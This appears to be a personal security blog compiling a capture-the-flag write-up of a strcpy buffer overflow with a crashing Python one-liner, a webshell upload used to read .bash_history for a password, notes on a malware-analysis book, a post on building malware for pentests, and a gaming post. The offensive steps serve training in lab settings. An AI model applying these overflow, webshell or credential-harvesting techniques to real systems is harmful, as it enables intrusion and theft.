STS: Login - Level 2

This level gives us a binary and some code. There’s also an alternative challenge (I may get to this another time). Here’s the code we are working with:

#include <stdlib.h>

#include <stdio.h>

#include <string.h>

#include <unistd.h>

int main(int argc, const char **argv) {

if (argc < 2) { printf("Fail. More Args...\n"); return 1; }

else {

setresuid(geteuid(),geteuid(),geteuid());

char buf2[4096];

char buf[16];

const char password[]="XXXXXXXXXXX";

strncpy(buf, argv[1], sizeof(buf) - 1);

if (strcmp(buf,password) != 0) {

printf("Wrong.\n");

return 1;

}

else {

strcpy(buf2,argv[2]);

printf("%s",buf2);

return 0;

}

}

}

We can see in the code that there are 2 buffers and a that the second buffer uses the insecure strcpy function. However, to get to this segment of code, we need to know the password. In order to get this I ran “strings” on the binary and was able to quickly pickout the password. Now if I run the program with the password, I can pass attempt to overflow the buffer.

$ ./level2 [removed] `python -c 'print "A" * 5000'`

I get a segmentation fault. We can see in gdb that we overwrite the eip with A’s.

overwrote eip

Now all we need to do is craft up our basic exploit and get the key! :)

STS: Logic - Level 1

This challenge was fairly easy like all level 1s. We have a web app with a file upload. The hint tells us that files are uploaded to the /uploads/ folder and to take a look at the users’ home directories for clues. I uploaded a tiny webshell and headed to /home/level1. I noticed that there is a file called “README”. This file says that we are close but to not look so far. Since this is a linux machine, the next obvious place is to check the .bash_history file. Bingo! There’s the password.

Practical Malware Analysis Chapter 1

This chapter was about basic static analysis. It went over tools to quickly analyze a windows binary to see if it contains malware. An example of basic steps include: using virustotal to scan the binary against numerous AVs; checking the Timestamp of compilation; using PEiD to see if the binary is packed; using tools to inspect the PE headers for clues of malicious intent and packing.

The labs are fun, and give practical hands on exercise. There are tons of books out there, but the best ones give labs or some kind of practice. The labs go from easy to hard and the solutions in the back come verbose, so you know what you missed and how to solve the questions.

Really loving this book so far and am taking my time to really learn the material.

A Dive Into Malware

I don't understand why companies continually remove social-engineering and client-side attacks from scope. I think it's great that companies are getting their applications and external networks pentested, but attackers are and have always been getting into companies. How? By having your employees run malware on their machines.

0-days are great. They also aren't the most used method of gaining access to your system. In personal experience, I've almost ALWAYS had a user run benign 'malware' just as a proof of concept. Because of this, I think I'm going to start and jump into malware development and analysis. Humans are stupid, and I'll exploit that.

I'm going to start by reading http://www.amazon.com/Practical-Malware-Analysis-Dissecting-Malicious/dp/1593272901. Really looking forward to this read and the hands on labs. I also hope to come up with all types of malware examples to use on a pentest. If I don't ever use them but you do (legally), please share with me your experiences and let me taste your victories.

Note: This is a random blog post. Mostly a reminder for me why I'm doing this again.

LCS

Oh boy,

LCS is back for the summer split and it is intense. As usual, when gaming championships are on, I take a break from security. Sorry if you don't see much in the next few weeks since LCS is on.

I'm relatively new to LoL but not MOBA. I think I really enjoy playing AP Carry but I'm still getting a feel for all the positions. I definitely enjoy watching the pros play. Watch, learn, mimic. I feel this cycle is what I've always done when improving gaming skills. Hopefully I can pick up a few tricks by watching some youtube, twitch videos of pros playing.

I've really taken an interest to @dscarra. His videos are pretty funny and he does talk a decent amount allowing me to know his thought process and why he did what he did. Because of scarra, I've been cheering Dignitas throughout the LCS summer split season. Him and Kiwi definitely help me choose my "root for" team.

Good luck guys!